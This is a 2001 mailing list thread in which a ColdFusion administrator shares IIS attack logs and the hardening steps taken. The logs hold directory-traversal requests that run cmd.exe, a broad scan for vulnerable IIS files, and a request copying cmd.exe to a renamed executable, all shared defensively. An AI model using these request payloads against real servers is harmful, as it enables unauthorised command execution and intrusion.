This was the exact hack on my client's server. The log files were almost
identical... just different IP addresses.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, May 08, 2001 9:52 PM
To: CF-Talk
Subject: OT: Log files of a web attack.


Hi,

I thought the group would like to see the techniques of a recent attack on
our web servers. They've been doing this a couple times a day for a week.
UUNet (their ISP) is slow in stopping them.

To secure IIS we've removed all extensions except cfm. We've taken out all
the IIS folders and files like /mdac, /scripts and /printers. We've secured
the cfide folder with passwords, including locking out the user after a couple
of failed attempts and logging the failures. Lastly, we've removed all permissions
from cmd.exe.

This has kept them out to date. Any additional ideas are welcomed. None of
this is top secret info; the hackers already know it, but do you, and are you
protected?

HTH,

Rick Moon


2001-05-08 12:36:44 209.183.204.251 - myIP 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:36:44 209.183.204.251 - myIP 80 GET /scripts/..%pc../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:36:45 209.183.204.251 - myIP 80 GET /scripts/..%9v../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:36:56 209.183.204.251 - myIP 80 GET /scripts/..%qf../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:37:00 209.183.204.251 - myIP 80 GET /scripts/..%8s../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:37:00 209.183.204.251 - myIP 80 GET /scripts/...../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:37:04 209.183.204.251 - myIP 80 GET /scripts/..o../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:37:08 209.183.204.251 - myIP 80 GET /scripts/..??../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:37:08 209.183.204.251 - myIP 80 GET /scripts/..???../winnt/system32/cmd.exe /c+dir 404 -
2001-05-08 12:38:17 209.183.204.251 - myIP 80 GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 01:26:07 200.245.48.155 - myIP GET /scripts..\../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:57:58 200.230.112.153 - myIP 80 GET /iisadmpwd/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:58:00 200.230.112.153 - myIP 80 GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:58:14 200.230.112.153 - myIP 80 GET /cgi-bin/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:58:22 200.230.112.153 - myIP 80 GET /samples/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:58:29 200.230.112.153 - myIP 80 GET /_vti_cnf/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:58:36 200.230.112.153 - myIP 80 GET /_vti_bin/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-03 17:58:42 200.230.112.153 - myIP 80 GET /adsamples/../../../../../../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:43:02 200.245.48.132 - myIP 80 HEAD /aaa - 404 -
2001-05-05 02:43:04 200.245.48.132 - myIP 80 HEAD /carbo.dll - 404 -
2001-05-05 02:43:04 200.245.48.132 - myIP 80 HEAD /cgi-win/uploader.exe - 404 -
2001-05-05 02:43:06 200.245.48.132 - myIP 80 HEAD /search97.vts - 404 -
2001-05-05 02:43:08 200.245.48.132 - myIP 80 HEAD /_vti_inf.html - 200 -
2001-05-05 02:43:10 200.245.48.132 - myIP 80 HEAD /_vti_pvt/service.pwd - 404 -
2001-05-05 02:43:12 200.245.48.132 - myIP 80 HEAD /_vti_pvt/users.pwd - 404 -
2001-05-05 02:43:13 200.245.48.132 - myIP 80 HEAD /_vti_pvt/authors.pwd - 404 -
2001-05-05 02:43:17 200.245.48.132 - myIP 80 HEAD /....../autoexec.bat - 404 -
2001-05-05 02:43:17 200.245.48.132 - myIP 80 HEAD /..../config.sys - 404 -
2001-05-05 02:43:20 200.245.48.132 - myIP 80 HEAD /iisadmpwd/achg.htr - 404 -
2001-05-05 02:43:20 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp.htr - 404 -
2001-05-05 02:43:21 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp2.htr - 404 -
2001-05-05 02:43:21 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp2b.htr - 404 -
2001-05-05 02:43:24 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp3.htr - 404 -
2001-05-05 02:43:24 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp4.htr - 404 -
2001-05-05 02:43:25 200.245.48.132 - myIP 80 HEAD /iisadmpwd/aexp4b.htr - 404 -
2001-05-05 02:43:25 200.245.48.132 - myIP 80 HEAD /iisadmpwd/anot.htr - 404 -
2001-05-05 02:43:27 200.245.48.132 - myIP 80 HEAD /iisadmpwd/anot3.htr - 404 -
2001-05-05 02:43:27 200.245.48.132 - myIP 80 HEAD /cgi-bin/visadmin.exe - 404 -
2001-05-05 02:43:29 200.245.48.132 - myIP 80 HEAD /scripts/no-such-file.pl - 404 -
2001-05-05 02:43:29 200.245.48.132 - myIP 80 HEAD /scripts/fpcount.exe - 404 -
2001-05-05 02:43:30 200.245.48.132 - myIP 80 HEAD /cgi-bin/rguest.exe - 404 -
2001-05-05 02:43:30 200.245.48.132 - myIP 80 HEAD /cgi-bin/wguest.exe - 404 -
2001-05-05 02:43:32 200.245.48.132 - myIP 80 HEAD /default.asp::$DATA - 404 -
2001-05-05 02:43:35 200.245.48.132 - myIP 80 HEAD /msadc/Samples/SELECTOR/showcode.asp |-|0|404_Object_Not_Found 404 -
2001-05-05 02:43:36 200.245.48.132 - myIP 80 HEAD /adsamples/config/site.csc - 404 -
2001-05-05 02:43:36 200.245.48.132 - myIP 80 HEAD /scripts/iisadmin/ism.dll http/dir 404 -
2001-05-05 02:43:37 200.245.48.132 - myIP 80 HEAD /AdvWorks/equipment/catalog_type.asp |-|0|404_Object_Not_Found 404 -
2001-05-05 02:43:38 200.245.48.132 - myIP 80 HEAD /cfdocs/expelval/openfile.cfm - 401 -
2001-05-05 02:43:38 200.245.48.132 - myIP 80 HEAD /cfdocs/expelval/ExprCalc.cfm - 401 -
2001-05-05 02:43:44 200.245.48.132 - myIP 80 HEAD /cfdocs/expelval/displayopenedfile.cfm - 401 -
2001-05-05 02:43:44 200.245.48.132 - myIP 80 HEAD /cfdocs/expelval/sendmail.cfm - 401 -
2001-05-05 02:43:45 200.245.48.132 - myIP 80 HEAD /GetFile.cfm - 200 -
2001-05-05 02:43:49 200.245.48.132 - myIP 80 HEAD /cgi-bin/get32.exe - 404 -
2001-05-05 02:43:49 200.245.48.132 - myIP 80 HEAD /cgi-bin/alibaba.pl - 404 -
2001-05-05 02:43:51 200.245.48.132 - myIP 80 HEAD /cgi-bin/tst.bat - 404 -
2001-05-05 02:43:51 200.245.48.132 - myIP 80 HEAD /default.asp - 404 -
2001-05-05 02:43:52 200.245.48.132 - myIP 80 HEAD /winnt/repair/sam._ - 404 -
2001-05-05 02:43:52 200.245.48.132 - myIP 80 HEAD /cgi-bin/imagemap.exe - 404 -
2001-05-05 02:43:52 148.233.95.58 - myIP 80 GET /index.cfm - 200 Mozilla/4.0+(compatible;+MSIE+5.5;+Windows+98;+Win+9x+4.90)
2001-05-05 02:43:54 200.245.48.132 - myIP 80 HEAD /cgi-bin/cgitest.exe - 404 -
2001-05-05 02:43:54 200.245.48.132 - myIP 80 HEAD /config.sys - 404 -
2001-05-05 02:43:55 200.245.48.132 - myIP 80 HEAD /scripts/webbbs.exe - 404 -
2001-05-05 02:43:57 200.245.48.132 - myIP 80 HEAD /cgi-bin/input.bat - 404 -
2001-05-05 02:44:03 200.245.48.132 - myIP 80 HEAD /test.idq - 404 -
2001-05-05 02:44:04 200.245.48.132 - myIP 80 HEAD /test.ida - 404 -
2001-05-05 02:44:05 200.245.48.132 - myIP 80 HEAD /scripts/counter.exe - 404 -
2001-05-05 02:44:05 200.245.48.132 - myIP 80 HEAD /common/browser.inc - 404 -
2001-05-05 02:44:08 200.245.48.132 - myIP 80 HEAD /cgi-bin/echo.bat - 404 -
2001-05-05 02:44:08 200.245.48.132 - myIP 80 HEAD /cgi-bin/hello.bat - 404 -
2001-05-05 02:44:09 200.245.48.132 - myIP 80 HEAD /rightfax/fuwww.dll - 404 -
2001-05-05 02:44:09 200.245.48.132 - myIP 80 HEAD /scripts/cgimail.exe - 404 -
2001-05-05 02:44:12 200.245.48.132 - myIP 80 HEAD /officescan/cgi/jdkRqNotify.exe - 404 -
2001-05-05 02:44:12 200.245.48.132 - myIP 80 HEAD /ows-bin/perlidlc.bat &dir 404 -
2001-05-05 02:44:13 200.245.48.132 - myIP 80 HEAD /cgi-bin/windmail.exe - 404 -
2001-05-05 02:44:16 200.245.48.132 - myIP 80 HEAD /null.htw CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full 404 -
2001-05-05 02:44:16 200.245.48.132 - myIP 80 HEAD /_vti_bin/_vti_aut/dvwssr.dll - 404 -
2001-05-05 02:44:17 200.245.48.132 - myIP 80 HEAD /scripts/wa.exe - 404 -
2001-05-05 02:45:22 200.64.239.78 - myIP 80 GET /index.cfm - 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
2001-05-05 02:46:23 200.53.250.14 - myIP 80 GET /index.cfm - 200 Mozilla/4.0+(compatible;+MSIE+5.0;+Windows+98;+DigExt)
2001-05-05 02:48:53 200.245.48.141 - myIP 80 HEAD /index.cfm - 200 -
2001-05-05 02:49:25 200.245.48.141 - myIP 80 GET /scripts/..%qf../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:49:36 200.245.48.141 - myIP 80 GET /scripts/..%8s../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:49:48 200.245.48.141 - myIP 80 GET /scripts/..\../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:49:53 200.245.48.141 - myIP 80 GET /scripts/..o../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:50:05 200.245.48.141 - myIP 80 GET /scripts/..??../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:50:11 200.245.48.141 - myIP 80 GET /scripts/..???../winnt/system32/cmd.exe /c+dir 404 -
2001-05-05 02:43:07 200.245.48.132 - myIP HEAD /scripts/tools/newdsn.exe - 404 -
2001-05-05 02:43:07 200.245.48.132 - myIP HEAD /scripts/tools/getdrvs.exe - 404 -
2001-05-05 02:43:14 200.245.48.132 - myIP HEAD /_vti_pvt/administrators.pwd - 404 -
2001-05-05 02:43:14 200.245.48.132 - myIP HEAD /_vti_pvt/shtml.dll - 404 -
2001-05-05 02:43:16 200.245.48.132 - myIP HEAD /_vti_pvt/shtml.exe - 404 -
2001-05-05 02:43:17 200.245.48.132 - myIP HEAD /samples/search/queryhit.htm - 404 -
2001-05-05 02:43:33 200.245.48.132 - myIP HEAD /iissamples/exair/howitworks/codebrws.asp - 404 -
2001-05-05 02:43:33 200.245.48.132 - myIP HEAD /iissamples/sdk/asp/docs/codebrws.asp - 404 -
2001-05-05 02:43:56 200.245.48.132 - myIP HEAD /cgi-bin/test.bat - 404 -
2001-05-05 02:43:59 200.245.48.132 - myIP HEAD /cgi-bin/input2.bat - 404 -
2001-05-05 02:43:59 200.245.48.132 - myIP HEAD /ssi/envout.bat - 404 -
2001-05-05 02:44:00 200.245.48.132 - myIP HEAD /msadc/msadcs.dll - 404 -
2001-05-05 02:44:00 200.245.48.132 - myIP HEAD /cgi-bin/htimage.exe - 404 -
2001-05-05 02:44:02 200.245.48.132 - myIP HEAD /test.idc - 404 -
2001-05-05 02:44:05 200.245.48.132 - myIP HEAD /test.idw - 404 -
2001-05-05 02:44:11 200.245.48.132 - myIP HEAD /default.asp - 404 -

This is the really bad one.

2001-05-01 08:23:09 200.245.48.145 - myIP 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy%20c:\winnt\system32\cmd.exe%20sensepost.exe
2001-05-01 08:23:11 200.245.48.145 - myIP 80 GET /scripts/../../inetpub/scripts/sensepost.exe /c+dir%20c:\inetpub\wwwroot

end.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Structure your ColdFusion code with Fusebox. Get the official book at 
http://www.fusionauthority.com/bkinfo.cfm

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists
